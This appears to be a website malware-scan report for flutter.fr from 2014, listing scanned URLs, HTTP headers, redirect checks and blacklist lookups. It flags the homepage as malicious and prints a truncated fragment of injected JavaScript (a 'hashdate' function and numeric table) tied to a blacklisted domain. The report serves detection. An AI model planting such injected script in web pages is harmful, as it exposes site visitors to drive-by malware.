Scanned pages/files
Request | Server response | Status |
http://flutter.fr/ | 200 OK Content-Length: 17219 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 49fbb8e.eu function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,221167763 ...[3441 bytes skipped]... | ||
https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js | 200 OK Content-Length: 85260 Content-Type: text/javascript | clean |
http://flutter.fr/js/slides.min.jquery.js | 200 OK Content-Length: 6784 Content-Type: application/javascript | clean |
http://flutter.fr/js/jquery.easing.min.js | 200 OK Content-Length: 2585 Content-Type: application/javascript | clean |
http://flutter.fr/js/jquery.lavalamp.min.js | 200 OK Content-Length: 724 Content-Type: application/javascript | clean |
http://flutter.fr/js/jquery.lavalamp.js | 200 OK Content-Length: 3136 Content-Type: application/javascript | clean |
http://flutter.fr/spip.php?rubrique4 | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=0 Connection: close Date: Sat, 07 Jun 2014 10:03:06 GMT Location: Competences Server: Apache Vary: Cookie,Accept-Encoding Content-Type: text/html Expires: Sat, 07 Jun 2014 10:03:06 GMT Composed-By: SPIP 3.0.4 @ www.spip.net + spip(3.0.4),compagnon(1.4.0),dump(1.6.7),images(1.1.1),forum(1.8.16),jqueryui(1.8.21),mediabox(0.8.1),medias(2.7.32),mots(2.4.8),msie_compat(1.2.0),organiseur(0.8.6),petitions(1.4.3),porte_plume(1.11.6),revisions(1.7.0),safehtml(1.4.0),sites(1.7.6),squelettes_par_rubrique(1.1.0),stats(0.4.9),svp(0.80.1),tw(0.8.14),urls(1.4.13),vertebres(1.2.1),iterateurs(0.6.1),queue(0.6.6),breves(1.3.3),compresseur(1.6.7) Set-Cookie: 60gpBAK=R1224194687; path=/; expires=Sat, 07-Jun-2014 11:08:34 GMT Set-Cookie: 60gp=R4109773417; path=/; expires=Sat, 07-Jun-2014 11:08:11 GMT X-Powered-By: PHP/5.2.17 | clean |
http://flutter.fr/competences | 200 OK Content-Length: 6433 Content-Type: text/html | clean |
http://flutter.fr/spip.php?rubrique1 | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=0 Connection: close Date: Sat, 07 Jun 2014 10:03:07 GMT Location: portfolio Server: Apache Vary: Cookie,Accept-Encoding Content-Type: text/html Expires: Sat, 07 Jun 2014 10:03:07 GMT Composed-By: SPIP 3.0.4 @ www.spip.net + spip(3.0.4),compagnon(1.4.0),dump(1.6.7),images(1.1.1),forum(1.8.16),jqueryui(1.8.21),mediabox(0.8.1),medias(2.7.32),mots(2.4.8),msie_compat(1.2.0),organiseur(0.8.6),petitions(1.4.3),porte_plume(1.11.6),revisions(1.7.0),safehtml(1.4.0),sites(1.7.6),squelettes_par_rubrique(1.1.0),stats(0.4.9),svp(0.80.1),tw(0.8.14),urls(1.4.13),vertebres(1.2.1),iterateurs(0.6.1),queue(0.6.6),breves(1.3.3),compresseur(1.6.7) Set-Cookie: 60gpBAK=R1224196865; path=/; expires=Sat, 07-Jun-2014 11:05:29 GMT Set-Cookie: 60gp=R477048287; path=/; expires=Sat, 07-Jun-2014 11:02:30 GMT X-Powered-By: PHP/5.2.17 | clean |
http://flutter.fr/portfolio | 200 OK Content-Length: 12913 Content-Type: text/html | clean |
http://flutter.fr/fonctions.js | 404 Not Found Content-Length: 210 Content-Type: text/html | clean |
http://flutter.fr/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://flutter.fr/js/jquery-1.7.1.min.js | 200 OK Content-Length: 93867 Content-Type: application/javascript | clean |
http://flutter.fr/js/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://flutter.fr/js/jquery.easing.compatibility.js | 200 OK Content-Length: 1726 Content-Type: application/javascript | clean |
http://flutter.fr/jquery.isotope.min.js | 200 OK Content-Length: 15876 Content-Type: application/javascript | clean |
http://flutter.fr/spip.php?rubrique3 | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=0 Connection: close Date: Sat, 07 Jun 2014 10:03:09 GMT Location: Contact Server: Apache Vary: Cookie,Accept-Encoding Content-Type: text/html Expires: Sat, 07 Jun 2014 10:03:09 GMT Composed-By: SPIP 3.0.4 @ www.spip.net + spip(3.0.4),compagnon(1.4.0),dump(1.6.7),images(1.1.1),forum(1.8.16),jqueryui(1.8.21),mediabox(0.8.1),medias(2.7.32),mots(2.4.8),msie_compat(1.2.0),organiseur(0.8.6),petitions(1.4.3),porte_plume(1.11.6),revisions(1.7.0),safehtml(1.4.0),sites(1.7.6),squelettes_par_rubrique(1.1.0),stats(0.4.9),svp(0.80.1),tw(0.8.14),urls(1.4.13),vertebres(1.2.1),iterateurs(0.6.1),queue(0.6.6),breves(1.3.3),compresseur(1.6.7) Set-Cookie: 60gpBAK=R1224197954; path=/; expires=Sat, 07-Jun-2014 11:06:28 GMT Set-Cookie: 60gp=R4109773417; path=/; expires=Sat, 07-Jun-2014 11:04:45 GMT X-Powered-By: PHP/5.2.17 | clean |
http://flutter.fr/contact | 200 OK Content-Length: 6174 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: flutter.fr
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Sat, 07 Jun 2014 10:03:05 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Sat, 07 Jun 2014 10:03:04 GMT
Last-Modified: Sat, 07 Jun 2014 10:03:05 GMT
Composed-By: SPIP 3.0.4 @ www.spip.net + spip(3.0.4),compagnon(1.4.0),dump(1.6.7),images(1.1.1),forum(1.8.16),jqueryui(1.8.21),mediabox(0.8.1),medias(2.7.32),mots(2.4.8),msie_compat(1.2.0),organiseur(0.8.6),petitions(1.4.3),porte_plume(1.11.6),revisions(1.7.0),safehtml(1.4.0),sites(1.7.6),squelettes_par_rubrique(1.1.0),stats(0.4.9),svp(0.80.1),tw(0.8.14),urls(1.4.13),vertebres(1.2.1),iterateurs(0.6.1),queue(0.6.6),breves(1.3.3),compresseur(1.6.7)
Set-Cookie: 60gpBAK=R1224193598; path=/; expires=Sat, 07-Jun-2014 11:05:29 GMT
Set-Cookie: 60gp=R4109773417; path=/; expires=Sat, 07-Jun-2014 11:04:45 GMT
X-Powered-By: PHP/5.2.17
X-Spip-Cache: 86400
GET / HTTP/1.1
Host: flutter.fr
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Sat, 07 Jun 2014 10:03:05 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Sat, 07 Jun 2014 10:03:04 GMT
Last-Modified: Sat, 07 Jun 2014 10:03:05 GMT
Composed-By: SPIP 3.0.4 @ www.spip.net + spip(3.0.4),compagnon(1.4.0),dump(1.6.7),images(1.1.1),forum(1.8.16),jqueryui(1.8.21),mediabox(0.8.1),medias(2.7.32),mots(2.4.8),msie_compat(1.2.0),organiseur(0.8.6),petitions(1.4.3),porte_plume(1.11.6),revisions(1.7.0),safehtml(1.4.0),sites(1.7.6),squelettes_par_rubrique(1.1.0),stats(0.4.9),svp(0.80.1),tw(0.8.14),urls(1.4.13),vertebres(1.2.1),iterateurs(0.6.1),queue(0.6.6),breves(1.3.3),compresseur(1.6.7)
Set-Cookie: 60gpBAK=R1224193598; path=/; expires=Sat, 07-Jun-2014 11:05:29 GMT
Set-Cookie: 60gp=R4109773417; path=/; expires=Sat, 07-Jun-2014 11:04:45 GMT
X-Powered-By: PHP/5.2.17
X-Spip-Cache: 86400
Second query (visit from search engine):
GET / HTTP/1.1
Host: flutter.fr
Referer: http://www.google.com/search?q=flutter.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: flutter.fr
Referer: http://www.google.com/search?q=flutter.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=flutter.fr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://flutter.fr/
Result: flutter.fr is not infected or malware details are not published yet.
Result: flutter.fr is not infected or malware details are not published yet.